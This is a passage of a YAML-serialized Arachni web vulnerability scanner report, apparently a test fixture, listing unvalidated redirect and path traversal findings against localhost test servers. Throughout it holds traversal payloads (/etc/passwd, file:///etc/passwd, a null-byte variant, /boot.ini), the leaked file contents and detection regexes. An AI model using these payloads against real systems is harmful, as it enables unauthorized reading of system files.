        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Location: http://www.arachni-boogie-woogie.com
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: www.arachni-boogie-woogie.com
    internal_modname: UnvalidatedRedirect
    method: GET
    mod_name: UnvalidatedRedirect
    name: Unvalidated redirect
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :injected_orig: www.arachni-boogie-woogie.com
      :altered: input
      :element: link
      :params: 
        input: www.arachni-boogie-woogie.com
      :follow_location: true
      :injected: www.arachni-boogie-woogie.com
      :combo: 
        input: www.arachni-boogie-woogie.com
      :action: http://localhost:8976/link/straight?input=default
      :regexp: ""
    references: 
      OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      Server side verification should be employed
                          to ensure that the redirect destination is the one intended.
    response: ""
    severity: Medium
    tags: 
    - unvalidated
    - redirect
    - injection
    - header
    - location
    url: http://localhost:8976/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "819"
  cwe_url: http://cwe.mitre.org/data/definitions/819.html
  description: The web application redirects users to unvalidated URLs.
  elem: link
  internal_modname: UnvalidatedRedirect
  method: GET
  mod_name: UnvalidatedRedirect
  name: Unvalidated redirect
  references: 
    OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
  remedy_guidance: |-
    Server side verification should be employed
                        to ensure that the redirect destination is the one intended.
  severity: Medium
  tags: 
  - unvalidated
  - redirect
  - injection
  - header
  - location
  url: http://localhost:8976/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "819"
    cwe_url: http://cwe.mitre.org/data/definitions/819.html
    description: The web application redirects users to unvalidated URLs.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Location: http://www.arachni-boogie-woogie.com
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: defaultwww.arachni-boogie-woogie.com
    internal_modname: UnvalidatedRedirect
    method: GET
    mod_name: UnvalidatedRedirect
    name: Unvalidated redirect
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :injected_orig: www.arachni-boogie-woogie.com
      :altered: input
      :element: link
      :params: 
        input: defaultwww.arachni-boogie-woogie.com
      :follow_location: true
      :injected: defaultwww.arachni-boogie-woogie.com
      :combo: 
        input: defaultwww.arachni-boogie-woogie.com
      :action: http://localhost:8976/link/append?input=default
      :regexp: ""
    references: 
      OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      Server side verification should be employed
                          to ensure that the redirect destination is the one intended.
    response: ""
    severity: Medium
    tags: 
    - unvalidated
    - redirect
    - injection
    - header
    - location
    url: http://localhost:8976/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "819"
  cwe_url: http://cwe.mitre.org/data/definitions/819.html
  description: The web application redirects users to unvalidated URLs.
  elem: cookie
  internal_modname: UnvalidatedRedirect
  method: GET
  mod_name: UnvalidatedRedirect
  name: Unvalidated redirect
  references: 
    OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
  remedy_guidance: |-
    Server side verification should be employed
                        to ensure that the redirect destination is the one intended.
  severity: Medium
  tags: 
  - unvalidated
  - redirect
  - injection
  - header
  - location
  url: http://localhost:8976/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "819"
    cwe_url: http://cwe.mitre.org/data/definitions/819.html
    description: The web application redirects users to unvalidated URLs.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+valuewww.arachni-boogie-woogie.com
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Location: http://www.arachni-boogie-woogie.com
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: cookie valuewww.arachni-boogie-woogie.com
    internal_modname: UnvalidatedRedirect
    method: GET
    mod_name: UnvalidatedRedirect
    name: Unvalidated redirect
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :injected_orig: www.arachni-boogie-woogie.com
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie valuewww.arachni-boogie-woogie.com
      :injected: cookie valuewww.arachni-boogie-woogie.com
      :combo: 
        cookie2: cookie valuewww.arachni-boogie-woogie.com
      :action: http://localhost:8976/cookie/append
      :regexp: ""
    references: 
      OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      Server side verification should be employed
                          to ensure that the redirect destination is the one intended.
    response: ""
    severity: Medium
    tags: 
    - unvalidated
    - redirect
    - injection
    - header
    - location
    url: http://localhost:8976/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "819"
  cwe_url: http://cwe.mitre.org/data/definitions/819.html
  description: The web application redirects users to unvalidated URLs.
  elem: header
  internal_modname: UnvalidatedRedirect
  method: GET
  mod_name: UnvalidatedRedirect
  name: Unvalidated redirect
  references: 
    OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
  remedy_guidance: |-
    Server side verification should be employed
                        to ensure that the redirect destination is the one intended.
  severity: Medium
  tags: 
  - unvalidated
  - redirect
  - injection
  - header
  - location
  url: http://localhost:8976/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "819"
    cwe_url: http://cwe.mitre.org/data/definitions/819.html
    description: The web application redirects users to unvalidated URLs.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_userwww.arachni-boogie-woogie.com
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Location: http://www.arachni-boogie-woogie.com
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: arachni_userwww.arachni-boogie-woogie.com
    internal_modname: UnvalidatedRedirect
    method: GET
    mod_name: UnvalidatedRedirect
    name: Unvalidated redirect
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :injected_orig: www.arachni-boogie-woogie.com
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_userwww.arachni-boogie-woogie.com
      :injected: arachni_userwww.arachni-boogie-woogie.com
      :combo: 
        User-Agent: arachni_userwww.arachni-boogie-woogie.com
      :action: http://localhost:8976/header/append
      :regexp: ""
    references: 
      OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      Server side verification should be employed
                          to ensure that the redirect destination is the one intended.
    response: ""
    severity: Medium
    tags: 
    - unvalidated
    - redirect
    - injection
    - header
    - location
    url: http://localhost:8976/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: form
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: POST
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/unix/form/with_null
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "70"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: |-
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: !binary |
      L2V0Yy9wYXNzd2QALmh0bWw=

    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: POST
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?mi-x:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: &id001 |-
        root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: /etc/passwd
      :altered: input
      :element: form
      :params: 
        input: !binary |
          L2V0Yy9wYXNzd2QALmh0bWw=

      :follow_location: true
      :injected: !binary |
        L2V0Yy9wYXNzd2QALmh0bWw=

      :combo: 
        input: !binary |
          L2V0Yy9wYXNzd2QALmh0bWw=

      :action: http://localhost:11084/unix/form/with_null
      :verification: false
      :id: *id001
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?mi-x:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: |-
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/unix/form/with_null
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: form
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: POST
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/unix/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "70"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: |-
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: file:///etc/passwd
    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: POST
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?mi-x:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: &id002 |-
        root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: file:///etc/passwd
      :altered: input
      :element: form
      :params: 
        input: file:///etc/passwd
      :follow_location: true
      :injected: file:///etc/passwd
      :combo: 
        input: file:///etc/passwd
      :action: http://localhost:11084/unix/form/straight
      :verification: false
      :id: *id002
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?mi-x:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: |-
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/unix/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: link
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: GET
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/unix/link/straight?input=default.html
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "70"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: |-
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: /etc/passwd
    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: GET
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?mi-x:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: &id003 |-
        root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: /etc/passwd
      :altered: input
      :element: link
      :params: 
        input: /etc/passwd
      :follow_location: true
      :injected: /etc/passwd
      :combo: 
        input: /etc/passwd
      :action: http://localhost:11084/unix/link/straight?input=default.html
      :verification: false
      :id: *id003
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?mi-x:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: |-
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/unix/link/straight?input=default.html
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: link
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: GET
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/unix/link/with_null?input=default.html
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "70"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: |-
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: !binary |
      L2V0Yy9wYXNzd2QALmh0bWw=

    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: GET
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?mi-x:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: &id004 |-
        root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: /etc/passwd
      :altered: input
      :element: link
      :params: 
        input: !binary |
          L2V0Yy9wYXNzd2QALmh0bWw=

      :follow_location: true
      :injected: !binary |
        L2V0Yy9wYXNzd2QALmh0bWw=

      :combo: 
        input: !binary |
          L2V0Yy9wYXNzd2QALmh0bWw=

      :action: http://localhost:11084/unix/link/with_null?input=default.html
      :verification: false
      :id: *id004
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?mi-x:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: |-
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/unix/link/with_null?input=default.html
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: cookie
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: GET
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/unix/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=/etc/passwd%00.
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "70"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: |-
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: !binary |
      L2V0Yy9wYXNzd2QALg==

    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: GET
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?mi-x:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: &id005 |-
        root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: /etc/passwd
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: !binary |
          L2V0Yy9wYXNzd2QALg==

      :injected: !binary |
        L2V0Yy9wYXNzd2QALg==

      :combo: 
        cookie: !binary |
          L2V0Yy9wYXNzd2QALg==

      :action: http://localhost:11084/unix/cookie/straight
      :verification: false
      :id: *id005
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?mi-x:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: |-
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/unix/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: header
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: GET
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/unix/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: !binary |
          L2V0Yy9wYXNzd2QALg==

        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "70"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: |-
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: !binary |
      L2V0Yy9wYXNzd2QALg==

    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: GET
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?mi-x:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: &id006 |-
        root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: /etc/passwd
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: !binary |
          L2V0Yy9wYXNzd2QALg==

      :injected: !binary |
        L2V0Yy9wYXNzd2QALg==

      :combo: 
        User-Agent: !binary |
          L2V0Yy9wYXNzd2QALg==

      :action: http://localhost:11084/unix/header/straight
      :verification: false
      :id: *id006
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?mi-x:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: |-
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/unix/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: form
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: POST
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/windows/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "189"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    injected: /boot.ini
    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: POST
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?mi-x:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: /boot.ini
      :altered: input
      :element: form
      :params: 
        input: /boot.ini
      :follow_location: true
      :injected: /boot.ini
      :combo: 
        input: /boot.ini
      :action: http://localhost:11084/windows/form/straight
      :verification: false
      :id: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?mi-x:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      [boot loader]
      timeout=30
      default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
      [operating systems]
      multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/windows/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: form
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: POST
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
